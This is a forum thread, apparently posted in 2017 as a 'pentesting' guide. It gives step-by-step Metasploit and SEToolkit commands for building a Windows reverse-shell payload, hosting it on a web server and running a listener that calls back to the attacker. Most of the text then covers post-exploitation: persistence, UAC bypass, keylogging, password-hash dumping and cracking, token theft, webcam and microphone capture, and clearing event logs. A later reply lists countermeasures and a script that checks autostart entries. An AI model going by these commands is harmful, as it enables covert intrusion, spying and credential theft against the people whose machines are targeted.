MSF SETOOLKIT PARROT OS PENTESTING CODE & EXAMPLES
Code Examples should be used only within the scope of your local laws!
I accept no responsibility for your actions! Please be ethical!
1st
Update & Upgrade (then reboot):
- Code:
sudo apt update && sudo apt upgrade -y
- Code:
sudo apt-get --force-yes install -y git apache2 python-requests python-pymssql build-essential python-pexpect python-pefile python-crypto python-openssl
2nd
Install setoolkit:
Go into the folder where you want setoolkit to be and then:
- Code:
git clone https://github.com/trustedsec/social-engineer-toolkit.git
change your network settings so you have access from 10.0.0.0 to 192.168.0.0 for example!
Now To run...
- Code:
sudo setoolkit
Now select Options in this order:
1, 4, 2
put your ext or int ip depending on how far reach you want (remote ip requires port forwarding to port 5555)
You should be able to use hostnames / domain names as well as IPs
For example: jnet.sytes.net
now you can move payload (before you close setoolkit)
Move Payloads:
(Parrot OS)
- Code:
sudo mv /root/.set/payload.exe /home/USERNAME/scripts/payloads
sudo cp /home/USERNAME/scripts/payloads/payload.exe /var/www/html
(Kali)
- Code:
sudo mv /root/.set/payload.exe /root/Documents/Scripts/MSF/payloads
sudo cp /root/Documents/Scripts/MSF/payloads/payload.exe /var/www/html
Start your apache2 web server if required!
- Code:
sudo service apache2 start
Now you can access via your ip http://your-ip-here
now if you wish to make things faster you can create a file called Listener.sh here is the content of this file (used later)
- Code:
#!/bin/bash
# Usage ./Listener.sh
#
sudo msfconsole -r meterpreter.rc
As you can see it uses the .rc file, so here's the content of that file:
- Code:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.0.101
set LPORT 5555
set ExitOnSession false
exploit -j -z
help
Ok lets continue on!
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
(you have to be in a session for upload and execution)!
Upload script txt file
Example:
(Parrot OS)
- Code:
upload /home/USERNAME/scripts/MSF/update/script.txt c:\\Users\\Test\\Desktop
(Kali)
- Code:
upload /root/Documents/Scripts/MSF/update/script.txt c:\\Users\\Test\\Desktop
Run script.txt: (From relative path)
- Code:
resource update/script.txt
so if you start from a random path you will need the full path, Example:
- Code:
resource /root/Documents/Scripts/MSF/update/script.txt
(so the file can be on the linux side only and still work on remote system without needing to upload)!
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
After you have got a target you need to make it persistent! (@ logon)
- Code:
run persistence -U -i 5 -p 5555 -r 192.168.0.101
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Dealing with sessions:
- Code:
sessions -l lists all sessions
sessions -i (id) Interact with this session
sessions -k (id) Kills sessions with that id
after you have joined a session you can add persistence! (do this before all else)!
Now you can migrate
type in an active session:
- Code:
ps
to list processes and migrate (pid of explorer.exe)
- Code:
migrate 437
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
when you migrate to explorer.exe you can run key logger:
- Code:
use sniffer
keyscan_start
keyscan_dump
keyscan_stop
You can use connect commands too:
- Code:
msfconsole connect -S 192.168.0.15 -P 5555
Here are more random commands you can now go and learn about!
- Code:
enable rdp
- Code:
run getgui -e
create a new username after you have escalated privs
- Code:
getgui -u username -p password
execute -h
execute -H -f cmd.exe -a "/c net user username /delete"
- Code:
getprivs
use priv
POST commands!
~~~~~~~~~~~~~~
- Code:
run post/windows/gather/win_privs
search uac
use bypass uac option! after last command.
- Code:
use exploit/windows/local/bypassuac
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.10
set LPORT 8887
sessions -l
set SESSION 1
exploit
background
sessions -i
sessions -i 2
migrate (pid of explorer.exe)
- Code:
run post/windows/gather/hashdump
use jack the ripper to find password from hash!
- Code:
run auxiliary/analyze/jt_crack_fast < may not need
resource text.txt (.txt file stored in /usr/share/setfile.txt; the text will hold the commands)
- Code:
cmd
netstat
ipconfig
- Code:
resource /folder/file.txt
(Linux location, not Windows; it is run on Windows but held on Linux)!
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
show current directory
- Code:
getwd
Show Linux Directory
- Code:
lpwd
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
forward to a diff port:
- Code:
portfwd
see route:
- Code:
route
Token stealing:
- Code:
steal_token (PID)
- Code:
idletime
- Code:
use sniffer
keyscan_start
keyscan_stop
keyscan_dump
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- Code:
screenshot
webcam_list
webcam_stream -h
webcam_chat
record_mic -h
clearev
(when finished)
More info can be found @
https://www.youtube.com/watch?v=BDBUG75529M&list=PLnjNR4-S-EVqfJWovxEJyb7I0IOkKkoYM&index=74
https://www.youtube.com/watch?v=IvfJgwwq9Xs&index=63&list=PLnjNR4-S-EVqfJWovxEJyb7I0IOkKkoYM
https://www.youtube.com/watch?v=biMkKqWMC5Y&index=58&list=PLnjNR4-S-EVqfJWovxEJyb7I0IOkKkoYM
https://github.com/trustedsec/social-engineer-toolkit
For more msf xploits
exploit-db.com/remote
More random commands:
- Code:
use -l
- Code:
sysinfo
< to find username and os etc!
- Code:
rdesktop -u username -p password
- Code:
lpwd
< linux current directory (msf)
get resource hacker to change icon of exploit or add a binary to it!
kill a msf session
- Code:
sessions -k (id)
Now look into msfvenom, you can make payloads with this as well!
Last edited by jamied_uk on 15th May 2017, 13:48; edited 8 times in total
Re: MSF SETOOLKIT PARROT OS PENTESTING CODE & EXAMPLES
Countermeasures:
To find if you have any persistent things running on your system open task manager
look for randomly named executable (close them if you know it is not legit)
after a few seconds it may come back, so do this...
press host key + r to open run dialogue box
type
- Code:
msconfig
goto startup
and look for suspicious files running from your temp directory, deselect these and save, exit, restart and re-check again, also look in your startup locations (on start menu) and for linux os run
top look for anything you think shouldn't be running and google it, remove if required!
now upgrade your anti malware, anti virus, any spyware and update windows through its update service.
block all ports and apps on your router that you don't use and re-enable if you do in the future!
get a hardware firewall like Cisco or another good managed switch so that you can only allow traffic you wish to!
now it is a good idea to look into IDS, Intrusion Detection Systems are good!!!
Reply with your comments!
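Added example, not part of the original post: a PowerShell version of the msconfig / startup-folder check described above. It lists the standard logon autostart locations and marks entries that launch from a temp directory or through a script host; the match pattern is an assumed starting heuristic, not a definitive signature.

```powershell
# Added example, not from the original post. Run in the affected user's session;
# the HKLM keys and the common Startup folder are readable without elevation.
$runKeys = @(
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run'
)

# Assumed heuristic: launch path under a Temp directory, or a script host / script file.
$suspectPattern = '\\Temp\\|\.(vbs|js|bat|ps1)\b|wscript|cscript'

# Registry autostart values (the same entries msconfig's Startup tab lists).
$entries = @(foreach ($key in $runKeys) {
    if (-not (Test-Path -Path $key)) { continue }
    $regKey = Get-Item -Path $key
    foreach ($name in $regKey.GetValueNames()) {
        [pscustomobject]@{
            Source  = $key
            Name    = $name
            Command = [string]$regKey.GetValue($name)
        }
    }
})

# Per-user and all-users Startup folders on the Start menu.
$startupDirs = @(
    [Environment]::GetFolderPath('Startup'),
    [Environment]::GetFolderPath('CommonStartup')
) | Where-Object { $_ -and (Test-Path -Path $_) }

$entries += @(foreach ($dir in $startupDirs) {
    Get-ChildItem -Path $dir -File | ForEach-Object {
        [pscustomobject]@{ Source = $dir; Name = $_.Name; Command = $_.FullName }
    }
})

# Suspect entries first. A match is a lead to review by hand, not a verdict:
# some legitimate software also starts from these locations.
$entries |
    Select-Object @{ Name = 'Suspect'; Expression = { $_.Command -match $suspectPattern } },
                  Source, Name, Command |
    Sort-Object -Property Suspect -Descending |
    Format-List
```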
Re: MSF SETOOLKIT PARROT OS PENTESTING CODE & EXAMPLES
MSF Cheat Sheet
latesthackingnews.com/2015/09/07/metasploit-cheat-sheet-free-download
Re: MSF SETOOLKIT PARROT OS PENTESTING CODE & EXAMPLES
Unzipping Files Remotely MSF
Extra Content
I used my new Quick Reference Notes
jnet.sytes.net
- Code:
sudo service apache2 start
Move Payloads:
- Code:
sudo mv /root/.set/payload.exe /home/jay/MSF/payloads
sudo cp /home/jay/MSF/payloads/payload.exe /var/www/html
- Code:
sessions -i 1
Persistence:
- Code:
run persistence -U -i 5 -p 5555 -r domain.name.com
use sniffer
- Code:
keyscan_start
keyscan_dump
keyscan_stop
~~~~~~~~~~~~~~~~~~
1st move in to relative path
- Code:
lcd /home/jay/MSF/
upload payload.exe "C:\\payload.exe"
upload update/netcat.zip "C:\\Backup\\netcat.zip"
upload update/netcat.zip "C:\\Users\\Test\\My Documents\\netcat.zip"
upload update/netcat.zip
upload update/7z.exe "C:\\Backup\\7z.exe"
upload update/script.txt "C:\\script.txt"
upload update/7z.exe "7z.exe"
upload update/7z.dll "7z.dll"
then type
- Code:
shell
(in correct location for windows side) Unzip
- Code:
7z x *.zip -o*
More On
superuser.com/questions/95902/7-zip-and-unzipping-from-command-line
Use Resources:
resource update/script.txt
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
meterpreter> use priv
meterpreter> hashdump
cd\
resource script.txt
cd c:\\Users\\test\\Desktop\\
run winenum
https://www.offensive-security.com/metasploit-unleashed/existing-scripts/
Last edited by jamied_uk on 3rd June 2017, 18:41; edited 5 times in total